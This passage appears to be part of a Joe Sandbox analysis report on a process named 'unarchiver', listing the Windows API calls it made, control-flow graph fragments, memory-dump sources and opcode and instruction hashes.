                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                            • Opcode ID: d35e653b17d6167e7114cfe7cae1e438998e58dff088db01f47682449fa7770f
                                                                                                                                                                                                                                                            • Instruction ID: 5bb2f023f1b1832c5e1ca5381c5ccd94a93f7180b40a9fee98d8a6b78106324d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d35e653b17d6167e7114cfe7cae1e438998e58dff088db01f47682449fa7770f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A21BF71409384AFDB22CF60CC84F96BFB8EF0A314F08849AE9849F152C234A508CB72

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 272 e0a5fe-e0a656 275 e0a658 272->275 276 e0a65b-e0a667 272->276 275->276 277 e0a669 276->277 278 e0a66c-e0a675 276->278 277->278 279 e0a6c6-e0a6cb 278->279 280 e0a677-e0a67f CreateFileW 278->280 279->280 282 e0a685-e0a69b 280->282 283 e0a6cd-e0a6d2 282->283 284 e0a69d-e0a6c3 282->284 283->284
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E0A67D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 1e2b55fd3dfa98cbf480eabe74e8252b99c3f91777a463e99ca626a3e22cc8b0
                                                                                                                                                                                                                                                            • Instruction ID: 9c0ef0ba1e678806ba3a9637d48178e4c864fd5441d4c7c17cca7b43e59ff194
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e2b55fd3dfa98cbf480eabe74e8252b99c3f91777a463e99ca626a3e22cc8b0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E021A171500308AFE720DF65DC85F66FBE8EF08314F088469E9459B291D776E444CB76

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 287 e0a78f-e0a80d 291 e0a842-e0a847 287->291 292 e0a80f-e0a822 GetFileType 287->292 291->292 293 e0a824-e0a841 292->293 294 e0a849-e0a84e 292->294 294->293
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileType.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A815
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                                                                                                            • Opcode ID: b9a88f7f6034286ab8e529c1aa79ca6528ed6e94997e3fd22da47ab642d6513a
                                                                                                                                                                                                                                                            • Instruction ID: cb3b0031727dc3daf033d0045160010e8312bd2c3c184df69b2930df398e74d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9a88f7f6034286ab8e529c1aa79ca6528ed6e94997e3fd22da47ab642d6513a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2721DB754093846FE7128B21DC85BA2BFE8DF46314F0880DBE9848F193D268A909C775
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00E0AC36
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreatePipe
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2719314638-0
                                                                                                                                                                                                                                                            • Opcode ID: f74061bac57669c72b793fa8293eaf7bcaa9619ac95725db573be9f206856fc5
                                                                                                                                                                                                                                                            • Instruction ID: 66020012f663a22aed11faf27da299f2d717d0e140c1464c932aa4b71183f781
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f74061bac57669c72b793fa8293eaf7bcaa9619ac95725db573be9f206856fc5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A121D4715093846FC312DB21CC95F66BFB4EF86610F1884DBD8889B293D235A919CBA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00E0AA8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                                                            • Opcode ID: 5efb276e20ef4c552cf935ad815b3fae4ab367d8bb3deaf83b9977f8c45a5699
                                                                                                                                                                                                                                                            • Instruction ID: 109926006f24c2582a256318a981983c545dda23ad2716aa6cb4adbf1dadf8f1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5efb276e20ef4c552cf935ad815b3fae4ab367d8bb3deaf83b9977f8c45a5699
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D621B0716083C45FDB12CB29DC55B92BFE8AF06314F0D84EAE884DF193E224D949CB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • RegQueryValueExW.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A40C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: QueryValue
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3660427363-0
                                                                                                                                                                                                                                                            • Opcode ID: 545a5bf16a5370bc6c88a7e6aadd71d866ec5fee11a79d84bab3897fa7b18fdb
                                                                                                                                                                                                                                                            • Instruction ID: b9e42d2146ee3ab75677878004ec8e1c1602ebd742c07ebd2cb57bd8517c4f5e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 545a5bf16a5370bc6c88a7e6aadd71d866ec5fee11a79d84bab3897fa7b18fdb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 16219075600308AFE720CF25CC85FA6F7ECEF04714F08846AE9459B291D774E949CA72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ReadFile.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A9C1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                            • Opcode ID: 7d8ce985e58fcd10ad1e77d4be9e8bcade0458c3d7cf16ca3f281e0569763ef7
                                                                                                                                                                                                                                                            • Instruction ID: f34a1f6402bb7254b0dd83d6fd20f18055e6fb4369baebbe937ea27fc5bb7899
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d8ce985e58fcd10ad1e77d4be9e8bcade0458c3d7cf16ca3f281e0569763ef7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F11C871500304AFEB21CF61DC85FA6F7E8EF44324F08846AEA459B191C374A544CBB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A8DE
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                                                            • Opcode ID: eaef6355b913a4599c431efc4bcfae52a62f06cc13b1a694435c764111bf29a2
                                                                                                                                                                                                                                                            • Instruction ID: a126c54e82a3f736dd7918d08b87732cb0545c2d7de5b3fc75e81afc59c3121f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eaef6355b913a4599c431efc4bcfae52a62f06cc13b1a694435c764111bf29a2
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B311C471500308AFEB21DF64DC85BA6F7E8EF44324F18846AE9459B181C374A544CBB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00E0A30C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                            • Opcode ID: d49a42efcdaeaa4aa717cd22ce54f3d859dec9a50754dd878d1fc7692ae811c4
                                                                                                                                                                                                                                                            • Instruction ID: 073faa687fdb0101740414c077d133608b3fa5c6fc3a2c2d1aa5a0f8cc9c125b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d49a42efcdaeaa4aa717cd22ce54f3d859dec9a50754dd878d1fc7692ae811c4
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B21194754093C45FD7228B25DC54A52BFB4DF17224F0D80DBDD858F163D265A848CB72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileType.KERNELBASE(?,00000E24,737D8511,00000000,00000000,00000000,00000000), ref: 00E0A815
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3081899298-0
                                                                                                                                                                                                                                                            • Opcode ID: 01d8e2bdb47ac63b012d7f9ca8d129689dd48128d873fd1e5d5b46ddf40fb632
                                                                                                                                                                                                                                                            • Instruction ID: 105587af1bb239432254ece6a6604aa4b4e2420c98b3d672c97821c7381f3937
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 01d8e2bdb47ac63b012d7f9ca8d129689dd48128d873fd1e5d5b46ddf40fb632
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4901D671500308AFE720DB11DC85BA6F7D8DF04724F18C0AAEE059F281D778A944CAB6
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(?,?), ref: 00E0AA8B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4241100979-0
                                                                                                                                                                                                                                                            • Opcode ID: 3a87098e176ad6198d5e21de62dedf19f0ad8717e277d19ab7b801350954ebba
                                                                                                                                                                                                                                                            • Instruction ID: b3a801e20bdd7c5b26c85bbb17032a594ebb2ad1830e985f8a108e558612427d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a87098e176ad6198d5e21de62dedf19f0ad8717e277d19ab7b801350954ebba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A31130716002449FEB10CF65D985766BBE8AF04324F0C84BAED49DB281E774D944CB62
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetSystemInfo.KERNELBASE(?), ref: 00E0B208
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                                                            • Opcode ID: fb17d4b29e4e7b66e7e7080bf9fa3718dcdb19f78655902e11ca0e71ba8f0dfb
                                                                                                                                                                                                                                                            • Instruction ID: b02a5c4ced7a39624ae69792f518dbac871ce6b6913ebe50bab77763922bc1ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fb17d4b29e4e7b66e7e7080bf9fa3718dcdb19f78655902e11ca0e71ba8f0dfb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CB117071509380AFDB128F15DC84B56BFA4EF46224F0884EAED859F253D275A948CB72
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                                            • Opcode ID: bfb331691cf1032b7945864058c4adf52ea8ac30bece53b3c0594bcf4af2f840
                                                                                                                                                                                                                                                            • Instruction ID: c46a0916985b12638c4977dab4695197c66de5dab593a344088605392ec3c762
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bfb331691cf1032b7945864058c4adf52ea8ac30bece53b3c0594bcf4af2f840
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 631170755093C4AFDB128B25DC85B52BFF4EF06320F0984DAED858F2A3D365A848DB61
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreatePipe.KERNELBASE(?,00000E24,?,?), ref: 00E0AC36
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreatePipe
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2719314638-0
                                                                                                                                                                                                                                                            • Opcode ID: bf8700a905573707709a676828cf352cdf2d4e2afbee8dd0034825cc37de9836
                                                                                                                                                                                                                                                            • Instruction ID: 8f0323342c2c166f8c69a86906186099f03b733aad21a85ea3efdf42009357f0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf8700a905573707709a676828cf352cdf2d4e2afbee8dd0034825cc37de9836
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B017171600200AFD750DF16DC86B26FBE8FB88A20F18856AED489B741D735B915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindNextFileW.KERNELBASE(?,00000E24,?,?), ref: 00E0A1C2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                            • Opcode ID: 5be433546f0190b0b8fa3ab449872f93ad4a9cec12c306a596c6ad32a72eb552
                                                                                                                                                                                                                                                            • Instruction ID: 8f0bcd952f1a9d977ed38b07555f010e589b213716797af76496b99e834d3f4c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5be433546f0190b0b8fa3ab449872f93ad4a9cec12c306a596c6ad32a72eb552
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00017171600200AFD710DF16DC86B26FBE8FB88A20F18856AED489B741D735B915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTempPathW.KERNELBASE(?,00000E24,?,?), ref: 00E0A5B6
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: PathTemp
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2920410445-0
                                                                                                                                                                                                                                                            • Opcode ID: 370dc3cdfd82d922a2a1f04a2420878fe4fd9dee4628e7f2f55959946a5c876a
                                                                                                                                                                                                                                                            • Instruction ID: 41310389c48ed53418f3c544649004c10884c97b2d1a240be1960a5ba663bbaa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 370dc3cdfd82d922a2a1f04a2420878fe4fd9dee4628e7f2f55959946a5c876a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE01D671600200AFD710DF16CC86B26FBE8FB88A20F188159EC085B741D735F915CBE5
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseFind
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1863332320-0
                                                                                                                                                                                                                                                            • Opcode ID: 76a7b3b75db2a1ddfe6f83faee2fc8b726da3e14f41667229130abca22ccfe81
                                                                                                                                                                                                                                                            • Instruction ID: 5b461011bcba7e4883fcbfa1142cb0a14637afe3bf0a732541314159a83dc594
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76a7b3b75db2a1ddfe6f83faee2fc8b726da3e14f41667229130abca22ccfe81
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7001D1746002449FDB108F25D8857A2FBD4EF04324F08C0AADD459F292D779E888DEA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(?), ref: 00E0A30C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2340568224-0
                                                                                                                                                                                                                                                            • Opcode ID: e928339c6fc5c6a516a79967dee95feb4bf33855c5a0e2f7bf1d42b051e00f65
                                                                                                                                                                                                                                                            • Instruction ID: d8cd4d92db163d2498be3421dfc6d196d3c1a6994b4bf8bc713b9e43c83e404f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e928339c6fc5c6a516a79967dee95feb4bf33855c5a0e2f7bf1d42b051e00f65
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F08C345043489FDB208F15D8857A5FBE0EF04725F08C0AADD495F292D379A888DAA2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00E0A748
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: 0d77682b63a979a96d1ebbd82a44a8783fe66606fb13e07dd922dc1f7b04e4df
                                                                                                                                                                                                                                                            • Instruction ID: b7cd16add03e00beb6f601b768c1e25d9b2f24073723385f40f26c6c4a922a0b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d77682b63a979a96d1ebbd82a44a8783fe66606fb13e07dd922dc1f7b04e4df
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67219FB55097C09FDB128B25DC94792BFB8EF06320F0984EBDC858B5A3D2249909C772
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(?), ref: 00E0A748
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599510090.0000000000E0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E0A000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_e0a000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                                                                                                            • Opcode ID: 7ec677aec3c8758a7ec9503e62a03b51fade338f92801cf4bc599ebe7ca84fec
                                                                                                                                                                                                                                                            • Instruction ID: 00293919bc239db244b98da44958ba5c05b9c1f7f01ebdf89eaa57fce77df614
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7ec677aec3c8758a7ec9503e62a03b51fade338f92801cf4bc599ebe7ca84fec
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C01B1705003449FDB108F25D8857A5FBE4DF04324F0CC4BBDC459F282D378A984CAA2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 60b7f6356e65908bb9b32ddf8c30f29e74e890e898d9ae5b55c662a2c49f6126
                                                                                                                                                                                                                                                            • Instruction ID: 961b21c033d60c2f4f4683abb130d71bcee2eb019b9dab20bd187329df9b3212
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 60b7f6356e65908bb9b32ddf8c30f29e74e890e898d9ae5b55c662a2c49f6126
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15B11C74602110CFCB18EF66E958B5A77F2FF88344B548829D907AB359DF309E16CB90
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3600800592.0000000004CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CC0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_4cc0000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4cf1131b041c2f9d8c1c3ce978d0f934de6a8da3fee961c435dd7b6da90631cf
                                                                                                                                                                                                                                                            • Instruction ID: 3f7a19ef264e1a275c11c04bd77210949beefdde7efec6489ac59da97ef0704d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4cf1131b041c2f9d8c1c3ce978d0f934de6a8da3fee961c435dd7b6da90631cf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21119431A14118AFCB149BB8D848A9EB7F6FF88214B064875E606E7625EF31DC16C7D1
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599892812.0000000001030000.00000040.00000020.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_1030000_unarchiver.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b016041f0c121f450210600172b33d23437ec05811f341c995890489128ba790
                                                                                                                                                                                                                                                            • Instruction ID: 62974a997e8c017281c3073721b334fc937078fabbd5bbf2fbcb1d55cc140ded
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b016041f0c121f450210600172b33d23437ec05811f341c995890489128ba790
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E01D4B250D7447FC301DB55AC41C57BBFCEF86524F08C4AEEC888B202E265A9188BF2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.3599892812.0000000001030000.00000040.00000020.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
